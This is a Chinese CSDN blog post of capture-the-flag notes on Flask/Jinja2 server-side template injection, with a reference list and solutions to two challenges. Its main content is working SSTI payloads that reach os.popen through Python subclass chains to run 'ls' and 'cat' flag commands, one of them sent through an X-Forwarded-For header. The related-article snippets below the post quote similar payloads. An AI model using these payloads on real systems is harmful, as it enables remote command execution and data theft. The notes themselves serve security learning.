CTF题目记录8SSTI

最新推荐文章于 2024-05-02 04:10:46 发布
最新推荐文章于 2024-05-02 04:10:46 发布
阅读量1.4k 收藏 6
点赞数 1
分类专栏: CTF题目记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39679772/article/details/106543454
版权

7、16更:今天终于明白了一些,让我隔日再写写,加入一点自己的东西吧

github上的超全SSTI

Web_python_template_injection

flask模版注入不会啊,只能面向搜索引擎,已经入土了
首先是推荐两篇好文:

1.从零学习flask模板注入
(其实是从入门到入土,小白强推这篇
2.Flask/Jinja2 SSTI && python 沙箱逃逸
3.服务端模板注入攻击 (SSTI)之浅析
4.利用SSTI漏洞获取服务器Shell
5.Python——flask漏洞探究

不管现在还懂不懂原理,有payload模版就模仿着肝吧!

1.测试是否有注入点
{{1+1}} 之类的,成功执行则说明有模版注入

接下来是多个wp…

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl4g").read()}}

过程:
总的来说

{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("要执行的语句").read()}}

参考:1
2py沙箱逃逸

3 wp2

miniL Personal_IP_Query

放dlwp防忘 毕竟是想了好久的题目
在这里插入图片描述

http://e0579dc296f4fa31220536d95e3b68b5.challenge.mini.lctf.online:1080/?class=__class__&mro=__mro__&subclasses=__subclasses__&init=__init__&globals=__globals__&popen=popen&cmd=cat /flag

X-Forwarded-For: {{ ()[request.args.class][request.args.mro][-1][request.args.subclasses]()[127][request.args.init][request.args.globals][request.args.popen](request.args.cmd).read() }}
kkzz1x
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022工业互联网大赛-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队中有一个小伙伴电脑连不上局域网,只能从我电脑中下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto题。分享给需要的朋友,如果有人能写出writeup的话,那就...
网络安全攻防大赛ctf题目
03-09
网络安全攻防大赛ctf题目
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
qq_39947980的博客
03-13 1583
CTF题型 SSTI(1)基础必过 学会自己手动构造payload
Bugku CTF——WEB之SSTI学习笔记
qq_51096893的博客
12-19 4249
目录 知识前提 一.题目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些题目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF题目类型(我们今天讲解的是WEB类型中注入问题): 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
渗透学习-23- WEB 攻防-Python 考点&CTF 与 CMS-SSTI 模版注入&PYC 反编译
最新发布
2301_76268112的博客
05-02 16
举个例子,我想买裙子,这时候我会打开某宝,直接在搜索框输入“裙子”,就会出现跟裙子相关的一系列商品,各种颜色,各种样式。那我们来想一下,这么多商品的各种信息是直接全部写死在页面上的嘛?那我们每次查找的商品都不一样,需要的内存就太大了很显然,并不是,所以这里就体现了我们模板引擎的作用,它可以根据从数据库中实时提取出来的数据对html页面实时的渲染,这,就是模板引擎。漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,
CTF-SSTI(持续更新)
m0_74317362的博客
07-27 291
SSTI
CTF题型 SSTI(3) Smart SSTI 例题和题记
qq_39947980的博客
03-14 470
前面我们学习了Flask SSTISmart SSTI和Flask SSTI 不同Smart SSTI 是基于php的,居然可以在其中参考 Smart中文手册 https://www.smarty.net/docs/zh_CN/这里我们用 https://www.smarty.net/docs/zh_CN/language.function.eval.tpl#id456693标签{eval}执行任意php代码。
bugku ctf Web SSTI两道练习题
yonren54159的博客
09-01 471
第一题 服务端模块注入 payload {{'a'.__class__.__base__.__subclasses__()[177].__init__.__globals__['sys'].modules['os'].popen("ls").read()}} 针对flask,简单的payload,url_for函数中直接导入了os,直接利用 {{url_for.globals.os.popen(“ls”).read()}} 查看后发现有个app.py,使用cat命令查看源码,整理发现只需要执行echo
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
常规的CTF题目解析.pdf
08-07
从入门到高级的题目讲解,teacher g都有独到的见解。答题人与出题人的较量···文章和线上和线下的讲解。先是工具的准备,规划,如团队工作,和体力的补充。入门级的题目相信大家在线上都做过不少,都是考基本功...
SSTI例题buu[Flask]SSTI
cuddlylm的博客
04-08 3239
方法一:手注 打开只有这个 访问http://your-ip/?name={{233233}},得到54289,说明它执行了我们的命令,SSTI漏洞存在。 这里的54289是233233的运算结果 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals_
【BugKu 刷题笔记】【Simple_SSTI_1】
一个程序员
02-20 1442
文章目录0x01 题目0x02 题解0x03 知识点1. flask 与 secret_key2. 模板注入 0x01 题目 0x02 题解 输入url为: http://114.67.175.224:19636/?flag={{config.SECRET_KEY}} 即可得到flag 0x03 知识点 初学者, 在网上搜解题思路很容易可以找到。 但是不知其所以然所以整理一下知识点: 包含以下知识点: 1. flask 与 secret_key flask是一个轻量级的可定制框架,使用Python语言
青少年CTF-SSTI
weixin_49803180的博客
04-04 1198
在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的,因为wrapper是指这些函数并没有被重载,这时它们并不是function,不具有__globals__属性。python的object类中集成了很多的基础函数,我们想要调用的时候也是需要用object去操作的,主要是通过__mro__ 和 __bases__两种方式来创建。|attr()为jinja2原生函数,是一个过滤器,它只查找属性获取并返回对象的属性的值,过滤器与变量用管道符号( | )分割.%}1{% endif %}
CTF中flask SSTI的研究
qq_46266956的博客
10-14 497
...
CTF SSTI 一些记录
3569
10-13 5810
https://ctftime.org/writeup/10895 https://www.xmsec.cc/ssti-and-bypass-sandbox-in-jinja2/   ▼▼▼Shrine(Web:solved 58/810=7.1%)▼▼▼ This writeup is written by @kazkiti_ctf GET / HTTP/1.1 Host: shri...
CTF中常见注入题源码及脚本分析
weixin_30659829的博客
07-30 493
1.代码审计发现 这里没有用escape_string,因此存在注入。 1 function show($username){ 2 global $conn; 3 $sql = "select role from `user` where username ='".$username."'"; 4 $res = $conn ->query($sql); ...
Bugku-CTF SSTI ——新手ctf记录
xy7850的博客
09-21 896
目录 Simp_SSTI_1 解题过程 ​ Flask默认配置文件: flask查看配置文件的全局变量的playload: 设置secret_key: Simp_SSTI_2 解题过程: ​参考 Simp_SSTI_1 解题过程 进入场景,看到提示,得到第一条信息:参数名为 flag。 习惯性按F12,查看源码 看到新提示,得到第二条信息:需要flask设置secret_key变量 得到flag。 Flask默认配置文件: { 'D...
十八、bugku Simple_SSTI_1
山兔的博客
09-06 538
ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。 http://114.67.246.176:10828/?flag={{config}} ?flag={{config.SECRET_KEY}} {{}}是变量包裹标识符。{{}
buu ctf web进阶]ssti
08-23
在比赛中,常见的ctf题目会提供一些模板注入的挑战,参赛者需要在给定的条件下,构造合适的payload来实现攻击目标。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值